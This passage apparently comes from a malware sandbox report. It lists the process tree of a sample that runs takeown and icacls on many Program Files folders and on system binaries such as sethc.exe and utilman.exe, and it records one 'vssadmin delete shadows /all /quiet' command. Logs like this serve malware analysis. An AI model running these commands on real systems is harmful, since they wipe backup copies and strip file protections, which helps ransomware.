  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5564
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo" /grant Administrators:F
  2⤵
  PID:5796
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /a
  2⤵
  PID:336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /grant Administrators:F
  2⤵
  PID:688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /a
  2⤵
  PID:3804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /grant Administrators:F
  2⤵
  PID:4228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /a
  2⤵
  - Modifies file permissions
  PID:3464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a
  2⤵
  PID:5184
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /grant Administrators:F
  2⤵
  PID:3316
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1524
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /a
  2⤵
  PID:4344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /grant Administrators:F
  2⤵
  PID:1204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /a
  2⤵
  PID:1844
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /grant Administrators:F
  2⤵
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /a
  2⤵
  PID:3500
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /a
  2⤵
  PID:4428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a
  2⤵
  - Modifies file permissions
  PID:4416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1068
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:1404
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /a
  2⤵
  PID:4656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /grant Administrators:F
  2⤵
  PID:924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16" /a
  2⤵
  PID:1584
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16" /grant Administrators:F
  2⤵
  PID:3264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /a
  2⤵
  PID:4452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /grant Administrators:F
  2⤵
  PID:4848
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a
  2⤵
  PID:2988
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F
  2⤵
  PID:4812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /a
  2⤵
  PID:2172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine" /a
  2⤵
  PID:4204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine" /grant Administrators:F
  2⤵
  PID:5836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /grant Administrators:F
  2⤵
  PID:3036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a
  2⤵
  PID:3536
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Stationery" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F
  2⤵
  PID:4132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Stationery" /grant Administrators:F
  2⤵
  PID:2308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv" /a
  2⤵
  PID:5260
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv" /grant Administrators:F
  2⤵
  PID:1788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /a
  2⤵
  PID:3444
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /grant Administrators:F
  2⤵
  PID:4720
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit" /a
  2⤵
  PID:1880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /a
  2⤵
  PID:3744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.msc" /a
  2⤵
  PID:872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:6128
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.msc" /grant Administrators:F
  2⤵
  PID:1016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VC" /a
  2⤵
  - Possible privilege escalation attempt
  PID:336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VC" /grant Administrators:F
  2⤵
  PID:5084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VGX" /a
  2⤵
  PID:5912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VGX" /grant Administrators:F
  2⤵
  PID:4512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO" /a
  2⤵
  PID:816
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO" /grant Administrators:F
  2⤵
  PID:5584
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /a
  2⤵
  PID:4328
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\resmon.exe" /a
  2⤵
  PID:2144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:8
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\resmon.exe" /grant Administrators:F
  2⤵
  PID:4008
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /a
  2⤵
  PID:1652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /a
  2⤵
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /grant Administrators:F
  2⤵
  PID:1932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Services" /a
  2⤵
  PID:728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Services" /grant Administrators:F
  2⤵
  PID:4660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sethc.exe" /a
  2⤵
  PID:1304
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System" /a
  2⤵
  PID:4732
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sethc.exe" /grant Administrators:F
  2⤵
  PID:5900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System" /grant Administrators:F
  2⤵
  PID:3740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado" /a
  2⤵
  PID:5928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\de-DE" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4908
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\de-DE" /grant Administrators:F
  2⤵
  PID:4824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\en-US" /a
  2⤵
  - Modifies file permissions
  PID:4424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\en-US" /grant Administrators:F
  2⤵
  PID:4724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskkill.exe" /a
  2⤵
  PID:6040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskkill.exe" /grant Administrators:F
  2⤵
  PID:932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\es-ES" /a
  2⤵
  PID:4812
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\es-ES" /grant Administrators:F
  2⤵
  PID:5556
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\fr-FR" /a
  2⤵
  PID:5852
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\fr-FR" /grant Administrators:F
  2⤵
  PID:1480
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\it-IT" /a
  2⤵
  PID:4248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\it-IT" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\ja-JP" /a
  2⤵
  PID:5804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\ja-JP" /grant Administrators:F
  2⤵
  PID:5788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sfc.exe" /a
  2⤵
  PID:3536
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\de-DE" /a
  2⤵
  PID:5044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sfc.exe" /grant Administrators:F
  2⤵
  PID:5284
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\de-DE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\en-US" /a
  2⤵
  PID:6072
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\en-US" /grant Administrators:F
  2⤵
  PID:1724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\es-ES" /a
  2⤵
  PID:4408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\es-ES" /grant Administrators:F
  2⤵
  PID:1620
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\fr-FR" /a
  2⤵
  PID:3176
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\fr-FR" /grant Administrators:F
  2⤵
  PID:3152
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\rundll32.exe" /a
  2⤵
  - Modifies file permissions
  PID:6120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\it-IT" /a
  2⤵
  - Modifies file permissions
  PID:4216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\rundll32.exe" /grant Administrators:F
  2⤵
  PID:2060
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\it-IT" /grant Administrators:F
  2⤵
  PID:2932
- C:\windows\system32\vssadmin.exe
  "C:\windows\system32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5912
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ja-JP" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ja-JP" /grant Administrators:F
  2⤵
  PID:5896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc" /a
  2⤵
  PID:3616
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc" /grant Administrators:F
  2⤵
  PID:5996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\de-DE" /a
  2⤵
  PID:3776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\de-DE" /grant Administrators:F
  2⤵
  PID:264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\en-US" /a
  2⤵
  PID:4416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\en-US" /grant Administrators:F
  2⤵
  PID:4380
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\es-ES" /a
  2⤵
  PID:2024
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\es-ES" /grant Administrators:F
  2⤵
  PID:1224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\fr-FR" /a
  2⤵
  PID:4712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\fr-FR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4656
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\it-IT" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4468
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\it-IT" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\ja-JP" /a
  2⤵
  PID:4452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\ja-JP" /grant Administrators:F
  2⤵
  PID:3432
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB" /a
  2⤵
  PID:3208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB" /grant Administrators:F
  2⤵
  PID:1508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\de-DE" /a
  2⤵
  PID:4104
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\de-DE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2584
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\en-US" /a
  2⤵
  PID:5928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\en-US" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\es-ES" /a
  2⤵
  PID:1220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\es-ES" /grant Administrators:F
  2⤵
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\fr-FR" /a
  2⤵
  PID:4248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\fr-FR" /grant Administrators:F
  2⤵
  PID:1928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\it-IT" /a
  2⤵
  PID:4516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\it-IT" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1728
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\ja-JP" /a
  2⤵
  - Modifies file permissions
  PID:5236
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\ja-JP" /grant Administrators:F
  2⤵
  PID:4052
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\uk-UA" /a
  2⤵
  PID:3424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\uk-UA" /grant Administrators:F
  2⤵
  PID:368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad" /a
  2⤵
  PID:5428
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad" /grant Administrators:F
  2⤵
  PID:2324
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\attachments" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3608
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\attachments" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\reports" /a
  2⤵
  PID:3420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\reports" /grant Administrators:F
  2⤵
  PID:5356
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet" /a
  2⤵
  PID:2112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:6128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\dotnet.exe" /a
  2⤵
  PID:5412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\dotnet.exe" /grant Administrators:F
  2⤵
  PID:5712
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3704
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host" /grant Administrators:F
  2⤵
  PID:3976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr" /a
  2⤵
  PID:5420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr" /grant Administrators:F
  2⤵
  PID:5096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\6.0.27" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\6.0.27" /grant Administrators:F
  2⤵
  PID:5048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\7.0.16" /a
  2⤵
  PID:1068
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\7.0.16" /grant Administrators:F
  2⤵
  PID:1604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\8.0.2" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4860
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\8.0.2" /grant Administrators:F
  2⤵
  PID:5604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared" /a
  2⤵
  - Modifies file permissions
  PID:760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared" /grant Administrators:F
  2⤵
  PID:4380
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4848
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /a
  2⤵
  PID:4728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /grant Administrators:F
  2⤵
  PID:4844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /a
  2⤵
  - Modifies file permissions
  PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /grant Administrators:F
  2⤵
  PID:2772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /grant Administrators:F
  2⤵
  PID:1832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /a
  2⤵
  PID:4492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /grant Administrators:F
  2⤵
  PID:3472
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /a
  2⤵
  - Modifies file permissions
  PID:3800
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /grant Administrators:F
  2⤵
  PID:2452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /a
  2⤵
  PID:5684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /grant Administrators:F
  2⤵
  PID:3736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /a
  2⤵
  PID:2440
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /a
  2⤵
  PID:5176
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /grant Administrators:F
  2⤵
  PID:3192
- C:\windows\system32\takeown.exe
